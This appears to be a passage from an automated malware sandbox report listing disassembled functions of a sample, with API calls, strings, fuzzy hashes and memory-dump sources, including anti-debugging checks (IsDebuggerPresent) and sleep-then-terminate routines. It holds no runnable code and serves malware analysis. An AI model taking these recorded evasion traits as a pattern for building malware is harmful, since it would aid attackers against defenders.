Opcode Fuzzy Hash: 81ce489040b7c4ba0222b359d94b47ac924f6cfd74f6715105254163967c367f
Instruction Fuzzy Hash: 57211EB8805A04EFDB00CF64FC4568A7BA4FB48310F10A9BAE80892361EBB14C85CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 0243092B, Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 02430966
., xrefs: 0243095F
GetProcAddress., xrefs: 024309DC, 024309DF, 024309E4

Memory Dump Source

Source File: 00000000.00000002.271884102.0000000002430000.00000040.00000001.sdmp, Offset: 02430000, based on PE: false

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: f5a72875b2f5076c21f296cc97ddf5026454029ad255f668148db2c1a3a9512a
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 27314AB6900609DFDB11CF99C880AAEBBF9FF48324F15514AD841AB350D771EA45CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041C5E0, Relevance: 3.0, APIs: 2, Instructions: 12COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(00415B19), ref: 0041C5E0
DebuggerProbe.LIBCMTD ref: 0041C5EF

Part of subcall function 0041C610: RaiseException.KERNEL32(406D1388,00000000,00000006,00001001), ref: 0041C66C

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: Debugger$ExceptionPresentProbeRaise
String ID:
API String ID: 680636614-0
Opcode ID: 3e7621c7bd33b09b09eb772c5b6d56e2d7d2d30747667191d6dce85145af983a
Instruction ID: 9349fa3fc9e41d7273e77685a8d762860b7f30379abd8d341fb1f00c50d54cfb
Opcode Fuzzy Hash: 3e7621c7bd33b09b09eb772c5b6d56e2d7d2d30747667191d6dce85145af983a
Instruction Fuzzy Hash: 61C08C7038010182EF000AF25C853C321401740746F481071AA04D0281EA5EC8A0C01D

Uniqueness

Uniqueness Score: -1.00%

Function 0040C790, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00003720), ref: 0040C79A

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 986f86138aec51f383feb8def9f5781582004f048c3a2b7ce7df8ea60f73591e
Instruction ID: ae4241a1d4e38b103ce18a3a4471a335effc3d103a2785bfad94f5b792cf1079
Opcode Fuzzy Hash: 986f86138aec51f383feb8def9f5781582004f048c3a2b7ce7df8ea60f73591e
Instruction Fuzzy Hash: 85B01231144208B7430053E2AC098023F8CC5C86703610032F40C82140D96198014469

Uniqueness

Uniqueness Score: -1.00%

Function 02430D90, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.271884102.0000000002430000.00000040.00000001.sdmp, Offset: 02430000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
Instruction ID: ee10a09a37acb5ada140bb9681027abd66fe8f41aa5438930943b15d9ac537b9
Opcode Fuzzy Hash: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
Instruction Fuzzy Hash: 8DF0CD76A006049FDB22CF24C805BAE73F9FB88215F0452A6D80AD7342D330E942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00416E99, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 368COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00416F28
_get_int64_arg.LIBCMTD ref: 00416F50
__aullrem.LIBCMT ref: 004170F5
__aulldiv.LIBCMT ref: 00417117
_write_multi_char.LIBCMTD ref: 0041721E
_write_string.LIBCMTD ref: 00417239
_write_multi_char.LIBCMTD ref: 00417265

Strings

-, xrefs: 004171BE
9, xrefs: 00417128

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem_write_string
String ID: -$9
API String ID: 1652289597-1631151375
Opcode ID: 0dbc64d26de664043c98c38d7d055fcac562ce58b769552add859a401e78c35f
Instruction ID: de5102fec8321e5b85d0cfec1799047ba640386d01976f94451ff98cb5dc2b5e
Opcode Fuzzy Hash: 0dbc64d26de664043c98c38d7d055fcac562ce58b769552add859a401e78c35f
Instruction Fuzzy Hash: BAF107B1D052299FDB24CF58CC99BEEB7B5BB48304F1481DAE419A6281D7389EC0CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040912C, Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 293COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004091C1
_get_int64_arg.LIBCMTD ref: 004091E9
__aullrem.LIBCMT ref: 00409391
__aulldiv.LIBCMT ref: 004093B3
_write_multi_char.LIBCMTD ref: 004094CC
_write_multi_char.LIBCMTD ref: 00409513
__mbtowc_l.LIBCMTD ref: 00409582

Strings

9, xrefs: 004093C4

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: _get_int64_arg_write_multi_char$__aulldiv__aullrem__mbtowc_l
String ID: 9
API String ID: 374834154-2366072709
Opcode ID: 84ce5aae74adba7d399d0073aecd8e076bd34cf307cfa0898392016893d53613
Instruction ID: 2be826c27a8f202ffec1e2aebc170ca3e02e3105113296a5b3e0d73e26e3a3a1
Opcode Fuzzy Hash: 84ce5aae74adba7d399d0073aecd8e076bd34cf307cfa0898392016893d53613
Instruction Fuzzy Hash: 1ED13AB1D10219DFDB14CF99C881BEEB7B5BB89304F0445AAE509B7282D7389E84CF19

Uniqueness

Uniqueness Score: -1.00%

Function 00416BF7, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 241COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 00416BFB
_write_multi_char.LIBCMTD ref: 0041721E
_write_string.LIBCMTD ref: 00417239
_write_multi_char.LIBCMTD ref: 00417265

Strings

-, xrefs: 004171BE

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: _write_multi_char$_get_int_arg_write_string
String ID: -
API String ID: 3433125407-2547889144
Opcode ID: 91b28b428fd41dd6607747954148f06fb46fd56e6c87ac8c1cc3e5b5b4ba51c6
Instruction ID: d158982b4a06091cac67e2065b179ba42f2aa763abf68cfedb0bbeafd6b52a89
Opcode Fuzzy Hash: 91b28b428fd41dd6607747954148f06fb46fd56e6c87ac8c1cc3e5b5b4ba51c6
Instruction Fuzzy Hash: 09A16F70D052289BEB24DF55CC49BEEB7B1EB44304F1481DAE8197A291D7789EC0CF59

Uniqueness

Uniqueness Score: -1.00%

Function 00416A45, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

APIs

_get_int_arg.LIBCMTD ref: 00416A49
_write_multi_char.LIBCMTD ref: 0041721E
_write_string.LIBCMTD ref: 00417239
_write_multi_char.LIBCMTD ref: 00417265

Strings

-, xrefs: 004171BE

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: _write_multi_char$_get_int_arg_write_string
String ID: -
API String ID: 3433125407-2547889144
Opcode ID: f955fdb29d5cb245bbbe8d6ba3b239ef453b249a0d961018c9ec56271ebe623c
Instruction ID: b0b7e6b1a2df9b203622afa6e2312ec93aa3ef50dd7f1b98807660a7c6530afa
Opcode Fuzzy Hash: f955fdb29d5cb245bbbe8d6ba3b239ef453b249a0d961018c9ec56271ebe623c
Instruction Fuzzy Hash: A5A14BB1D052289FDB64CF54CC89BEEB7B1BB44304F1481DAE4196A291D7789EC0CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC48, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0040BCA9
__aullrem.LIBCMT ref: 0040BE76
__aulldiv.LIBCMT ref: 0040BE98

Strings

0, xrefs: 0040BC64
', xrefs: 0040BC48
9, xrefs: 0040BEA9

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$0$9
API String ID: 3120068967-269856862
Opcode ID: 41f2b569890593c4048fa512c3629f89190daf6dd3fae914f0326bdc5b092988
Instruction ID: a9176a38141aa6e70ae73083284ee1a40d885ade85415e6101a7527418f99f31
Opcode Fuzzy Hash: 41f2b569890593c4048fa512c3629f89190daf6dd3fae914f0326bdc5b092988
Instruction Fuzzy Hash: AA41F271904229CFDB64CF48C889BEEB7B5FF44304F1085AAD009AB281C7389E81CF89

Uniqueness

Uniqueness Score: -1.00%

Function 00416EC7, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00416F28
__aullrem.LIBCMT ref: 004170F5
__aulldiv.LIBCMT ref: 00417117

Strings

0, xrefs: 00416EE3
', xrefs: 00416EC7
9, xrefs: 00417128

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$0$9
API String ID: 3120068967-269856862
Opcode ID: 3a5f572e761f4631e86f663acba891b042cfc1c93ae2657cad725c256c759a3e
Instruction ID: cab43cc4f818fb9407e5acb3544fd95266a9e65c28d1772f894ad5478e63d53e
Opcode Fuzzy Hash: 3a5f572e761f4631e86f663acba891b042cfc1c93ae2657cad725c256c759a3e
Instruction Fuzzy Hash: 4F41D271D09229DFDB24CF58C899BEEBBB5BB48304F1481DAD409A7241C7389AC5CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0041E2FB, Relevance: 10.6, APIs: 7, Instructions: 90fileCOMMON

Download Yara Rule

APIs

ReadConsoleOutputCharacterA.KERNEL32(00000000,?,00000000,?,?), ref: 0041E34D
CopyFileA.KERNEL32(00425E20,00425D9C,00000000), ref: 0041E395
DeleteFileA.KERNEL32(00425E4C), ref: 0041E3A0
GetPriorityClass.KERNEL32(00000000), ref: 0041E3BA
SetEvent.KERNEL32(00000000), ref: 0041E3C2
GetPrivateProfileStringA.KERNEL32(00425E8C,00425E78,00425E70,?,00000000,00425E54), ref: 0041E3F6
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041E406

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: File$Read$CharacterClassConsoleCopyDeleteEventOutputPriorityPrivateProfileString
String ID:
API String ID: 655431097-0
Opcode ID: dc015eed9a92f3d7e43de895b688d7b286621dfa03e5760362728549e43f0ec0
Instruction ID: 9b00ba8f3d5a6cd07e5bbcc28f8ebffdca5ec8cd01da0624c2f2f2f708a4bb1b
Opcode Fuzzy Hash: dc015eed9a92f3d7e43de895b688d7b286621dfa03e5760362728549e43f0ec0
Instruction Fuzzy Hash: 2C31AE74E4021CEFDB04DFA4D845BEE7BB5BF48701F1085AAE909A7281C7B42A85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041E310, Relevance: 10.6, APIs: 7, Instructions: 79fileCOMMON

Download Yara Rule

APIs

ReadConsoleOutputCharacterA.KERNEL32(00000000,?,00000000,?,?), ref: 0041E34D
CopyFileA.KERNEL32(00425E20,00425D9C,00000000), ref: 0041E395
DeleteFileA.KERNEL32(00425E4C), ref: 0041E3A0
GetPriorityClass.KERNEL32(00000000), ref: 0041E3BA
SetEvent.KERNEL32(00000000), ref: 0041E3C2
GetPrivateProfileStringA.KERNEL32(00425E8C,00425E78,00425E70,?,00000000,00425E54), ref: 0041E3F6
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041E406

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: File$Read$CharacterClassConsoleCopyDeleteEventOutputPriorityPrivateProfileString
String ID:
API String ID: 655431097-0
Opcode ID: 1f44c4c86475a9a733066a0fcd6cf6318109c14345282bc8602f8e4075fa0c34
Instruction ID: 5dec7fa8a1a7b7cf657ff338b5ae2cb803ec3e5d0d267fa6a4b9384d695617a8
Opcode Fuzzy Hash: 1f44c4c86475a9a733066a0fcd6cf6318109c14345282bc8602f8e4075fa0c34
Instruction Fuzzy Hash: 1B31BF74E4021CEFDB04DFA4D845BEEBBB5FB58701F1081AAE905A3280C7B42A85CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041E5B2, Relevance: 10.5, APIs: 7, Instructions: 36threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(00000000,00000000), ref: 0041E5C1
SetConsoleMode.KERNEL32(00000000,?), ref: 0041E5D0
IsDBCSLeadByteEx.KERNEL32(00000000,00000000), ref: 0041E5DA
FindFirstChangeNotificationA.KERNEL32(004260D8,00000000,00000000), ref: 0041E5E9
LCMapStringW.KERNEL32(00000000,00000000,004260E0,00000000,?,00000000), ref: 0041E603
InterlockedIncrement.KERNEL32(?), ref: 0041E610
TlsSetValue.KERNEL32(00000000,00000000), ref: 0041E61A

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: ByteChangeConsoleFindFirstIncrementInterlockedLeadModeNotificationStringTerminateThreadValue
String ID:
API String ID: 1978024113-0
Opcode ID: d29957098e37e704b0c0a0cb067615934720143c004740a8b03a3b7ff935b27b
Instruction ID: c59d914e56b4906dc3a12347fb6c4cfd07202ad8e4fe7166384c5a6c76d5b709
Opcode Fuzzy Hash: d29957098e37e704b0c0a0cb067615934720143c004740a8b03a3b7ff935b27b
Instruction Fuzzy Hash: E2F01235384314BFE7609BA0AD4BF953B64AB49B02F1180A5F709A90D1CAA068058B29

Uniqueness

Uniqueness Score: -1.00%

Function 0041C4E0, Relevance: 9.1, APIs: 6, Instructions: 76COMMON

Download Yara Rule

APIs

___initconout.LIBCMTD ref: 0041C504

Part of subcall function 0041CE70: CreateFileA.KERNEL32(00425B94,40000000,00000003,00000000,00000003,00000000,00000000,?,0041C509), ref: 0041CE89

GetConsoleOutputCP.KERNEL32(00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 0041C589
WideCharToMultiByte.KERNEL32(00000000), ref: 0041C590
WriteConsoleA.KERNEL32(00428FA4,00000000,?,?,00000000), ref: 0041C5B7

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: Console$ByteCharCreateFileMultiOutputWideWrite___initconout
String ID:
API String ID: 3432720595-0
Opcode ID: 53c9fbec9189f412cbd067db4eeef7a4c94e04826d885bc6e862bfc5cd252841
Instruction ID: 8e556848e2d6192a746df83962f0c4829bdb1a0d329698464e8284f442c293b9
Opcode Fuzzy Hash: 53c9fbec9189f412cbd067db4eeef7a4c94e04826d885bc6e862bfc5cd252841
Instruction Fuzzy Hash: 7421E470641214FFDB20CB54DD88BEE376AAB18714F50813AF505871D0DB78A986DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC35, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0040BCA9
__aullrem.LIBCMT ref: 0040BE76
__aulldiv.LIBCMT ref: 0040BE98

Strings

0, xrefs: 0040BC64
9, xrefs: 0040BEA9

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 0$9
API String ID: 3120068967-1975997740
Opcode ID: 294fb31f5d5d351f2e778bf710c0b296c7a64999d3d16a53a5e2e0d47d44c5da
Instruction ID: a303c6598a7c0b3fe076eda218baccae4e4fa84bb0be4dc7c9ebc0a6f9473dd9
Opcode Fuzzy Hash: 294fb31f5d5d351f2e778bf710c0b296c7a64999d3d16a53a5e2e0d47d44c5da
Instruction Fuzzy Hash: 9D41E271914229DFDB64DF48C889BEEB7B5FF44304F1085AAD449BB281C7389A81CF89

Uniqueness

Uniqueness Score: -1.00%

Function 00416EB4, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00416F28
__aullrem.LIBCMT ref: 004170F5
__aulldiv.LIBCMT ref: 00417117

Strings

0, xrefs: 00416EE3
9, xrefs: 00417128

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 0$9
API String ID: 3120068967-1975997740
Opcode ID: 872c494957aaf89aa66f31ff1cc896ed29463f1129b8cf86eb06cc3f740f7456
Instruction ID: 143972cb1e8ddfa57849f32d30c8335497bce158e6f578cb2d9d7d7fa9ded8cb
Opcode Fuzzy Hash: 872c494957aaf89aa66f31ff1cc896ed29463f1129b8cf86eb06cc3f740f7456
Instruction Fuzzy Hash: F041F2B1D19229DFDB24CF58C899BEEBBB5BB48304F1081DAE409A7240C7389AC5CF45

Uniqueness

Uniqueness Score: -1.00%

Function 0040915A, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004091C1
__aullrem.LIBCMT ref: 00409391
__aulldiv.LIBCMT ref: 004093B3

Strings

', xrefs: 0040915A
9, xrefs: 004093C4

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: '$9
API String ID: 3120068967-1823400153
Opcode ID: 02dd4c31f3f119763d5193a35ee269ab6f0a67ab0387459a7a184376ccaae2b9
Instruction ID: a994f4636d4fd1d8c743fec6b514407a93f3c6a9cf75fa51588181e81b9d09a8
Opcode Fuzzy Hash: 02dd4c31f3f119763d5193a35ee269ab6f0a67ab0387459a7a184376ccaae2b9
Instruction Fuzzy Hash: 264107B1E101299FDB24CF48C981BAEB7B5FF85314F1444EA9549BB282D3785E81CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0041C713, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

__isatty.LIBCMTD ref: 0041C7F9
__getbuf.LIBCMTD ref: 0041C809
__write.LIBCMTD ref: 0041C891

Strings

RaA, xrefs: 0041C88D, 0041C7F5, 0041C7F8, 0041C890

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __getbuf__isatty__write
String ID: RaA
API String ID: 2861569966-3980658732
Opcode ID: 2ab0db8e475f85831f16af68bc40a134e9c1cc053892d49486d74af1d5760d03
Instruction ID: 62080d9dc68f04e14b8155d4cf95af235b0486f5fb7492b7c03328038fc6fe9a
Opcode Fuzzy Hash: 2ab0db8e475f85831f16af68bc40a134e9c1cc053892d49486d74af1d5760d03
Instruction Fuzzy Hash: 7C51E974A40209EFDB14DF94C8D1AADBBB1FF88324F148299E4456B395D734EA81CF84

Uniqueness

Uniqueness Score: -1.00%

Function 00409147, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 107COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004091C1
__aullrem.LIBCMT ref: 00409391
__aulldiv.LIBCMT ref: 004093B3

Strings

9, xrefs: 004093C4

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 3b37e0402f5e88a24cd54120ed0c8971b64c3c77b604363197ce8ccf3d50387e
Instruction ID: 9775ac8865775e0078212ff34c9d7a7a435287777d9b69ef593b4f53334ff859
Opcode Fuzzy Hash: 3b37e0402f5e88a24cd54120ed0c8971b64c3c77b604363197ce8ccf3d50387e
Instruction Fuzzy Hash: CF4106B1E101299FDB24CF48C881BAEB7B5BF85314F1444AA9549BB282C3785E81CF49

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC7D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0040BCA9
__aullrem.LIBCMT ref: 0040BE76
__aulldiv.LIBCMT ref: 0040BE98

Strings

9, xrefs: 0040BEA9

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: cf63fa43b2fec6a462cbc6b52d09e5480398d9048cf3ff36c2423729eb9e9a6a
Instruction ID: 2ae36520fe608f0e9bd27ae0c340c33d2df10bf196d53f0f246edd76fc421c82
Opcode Fuzzy Hash: cf63fa43b2fec6a462cbc6b52d09e5480398d9048cf3ff36c2423729eb9e9a6a
Instruction Fuzzy Hash: 1F41F4719106299FDB64DF48C889BEEB7B5FF84300F1085AAD049B7281C7389E80CF89

Uniqueness

Uniqueness Score: -1.00%

Function 00409195, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004091C1
__aullrem.LIBCMT ref: 00409391
__aulldiv.LIBCMT ref: 004093B3

Strings

9, xrefs: 004093C4

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 2cb42106214b933ff1057958f70d752e3326e961ca26f08f9843ce3b4d58efb5
Instruction ID: 71393cb405c719efe5244417ae959a61503950a56829886fd48ecbd10c15cf16
Opcode Fuzzy Hash: 2cb42106214b933ff1057958f70d752e3326e961ca26f08f9843ce3b4d58efb5
Instruction Fuzzy Hash: 694107B1A101299FDB24CF48C981BAEB7B5FF89314F0445EAD549B7282C7385E81CF09

Uniqueness

Uniqueness Score: -1.00%

Function 00416EFC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00416F28
__aullrem.LIBCMT ref: 004170F5
__aulldiv.LIBCMT ref: 00417117

Strings

9, xrefs: 00417128

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 8ce41912a1b347a263a91636f5d5f96e675f446a69cf18611fc11741e30a83ae
Instruction ID: 405050d5174ba0ee3e0eba664eb3cdc2441412e0c1c63fc81406b22780931f2e
Opcode Fuzzy Hash: 8ce41912a1b347a263a91636f5d5f96e675f446a69cf18611fc11741e30a83ae
Instruction Fuzzy Hash: 5041C271D15229DFEB24CF58C899BEEBBB5BB49304F10819AE049A7240C7389A85CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040BC2C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 0040BCA9
__aullrem.LIBCMT ref: 0040BE76
__aulldiv.LIBCMT ref: 0040BE98

Strings

9, xrefs: 0040BEA9

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 9721e498b965dfc23a5c6fb8e7f52c96cc77b554799f9a67d6aaa4935f960fb6
Instruction ID: 0a42655c7a774d879dc841d46314a80b26bf1ddbe6c657884e88b336a11a07f8
Opcode Fuzzy Hash: 9721e498b965dfc23a5c6fb8e7f52c96cc77b554799f9a67d6aaa4935f960fb6
Instruction Fuzzy Hash: 0341D471914629DFDB64DF58C989BEEB7B5FF84300F1045AAE109A7281C7389E81CF89

Uniqueness

Uniqueness Score: -1.00%

Function 0040913E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 004091C1
_get_int64_arg.LIBCMTD ref: 004091E9
__aullrem.LIBCMT ref: 00409391
__aulldiv.LIBCMT ref: 004093B3

Strings

9, xrefs: 004093C4

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: cb2bff02f70d6d2748a44f213675fbe404e2785281d23fe7b2221e6ee842fae9
Instruction ID: 2b032b969eef1cc73539dd068c6ab1a17e1f764d383506258b0b77334654677e
Opcode Fuzzy Hash: cb2bff02f70d6d2748a44f213675fbe404e2785281d23fe7b2221e6ee842fae9
Instruction Fuzzy Hash: 924106B1A00129DFDB24CF48D981B9EB7B5FF89314F1445EAA549B7282C3385E81CF19

Uniqueness

Uniqueness Score: -1.00%

Function 00416EAB, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

_get_int64_arg.LIBCMTD ref: 00416F28
_get_int64_arg.LIBCMTD ref: 00416F50
__aullrem.LIBCMT ref: 004170F5
__aulldiv.LIBCMT ref: 00417117

Strings

9, xrefs: 00417128

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID: _get_int64_arg$__aulldiv__aullrem
String ID: 9
API String ID: 2124759748-2366072709
Opcode ID: 888e69bf21e1732104ff1186960623cbb7378ef8ef070d964f58f46c1f86ec06
Instruction ID: 10ab773ce3fb23519fac46658c1cdc41e38e08bec72a7ee7b8a91b9d81674e43
Opcode Fuzzy Hash: 888e69bf21e1732104ff1186960623cbb7378ef8ef070d964f58f46c1f86ec06
Instruction Fuzzy Hash: 9441A271D15229DFDB24CF58C899BEEBBB5BB49304F1081DAE409A7240C7389AC5CF55

Uniqueness

Uniqueness Score: -1.00%

Function 00409000, Relevance: 6.2, APIs: 4, Instructions: 239COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.271492037.0000000000409000.00000020.00020000.sdmp, Offset: 00409000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 514b26060a052ab791055eac35d5f3142d0926c256ec69b39f1d47c2399f3e66
Instruction ID: 6c2de4499af3230f49cd3d528fbc42fa7d3fd1166e415e0bff70b252203ff194
Opcode Fuzzy Hash: 514b26060a052ab791055eac35d5f3142d0926c256ec69b39f1d47c2399f3e66
Instruction Fuzzy Hash: 62A15DB1D10118EBDB14DF94DC81BEEB3B5BB88304F0485AAE109B7282D7399E45CF59

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: uwtjrji PID: 6600 Parent PID: 528 uwtjrjiCOMMON

Executed Functions

Function 00401995, Relevance: 3.1, APIs: 2, Instructions: 52sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019D2
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019FA

Memory Dump Source

Source File: 00000012.00000002.330456850.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: bcdb4ce197b4624848e0434c3cecf8bb73fddbd079a89888b3aed0f19e214681
Instruction ID: 2ba8d485649ef9dc555f469e2d9c6b56d1050b598c7c2bb426bbb3a3204dd29a
Opcode Fuzzy Hash: bcdb4ce197b4624848e0434c3cecf8bb73fddbd079a89888b3aed0f19e214681
Instruction Fuzzy Hash: 9901F7B1308104FBDB016A948D51EBA3229AB04350F200537B643B80F1C57D9512AB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004019A1, Relevance: 3.0, APIs: 2, Instructions: 46sleepnativeCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019D2
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019FA

Memory Dump Source

Source File: 00000012.00000002.330456850.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: 91979d86caefdc2bec098f9fdaaa317bd5775bb9d9cee66cb7b385bce327cb2a
Instruction ID: 9ecdec514cf71f5eeb304a1e2f202b265b0d51b5f31dfdf67d95f392e824f2cf
Opcode Fuzzy Hash: 91979d86caefdc2bec098f9fdaaa317bd5775bb9d9cee66cb7b385bce327cb2a
Instruction Fuzzy Hash: 45F0D1B2304145FADB019F848D91EAE3225AB04351F200977F753B80F1C53D8512AB2B

Uniqueness

Uniqueness Score: -1.00%

Function 004019AD, Relevance: 3.0, APIs: 2, Instructions: 42sleepnativeCOMMON

Download Yara Rule

APIs

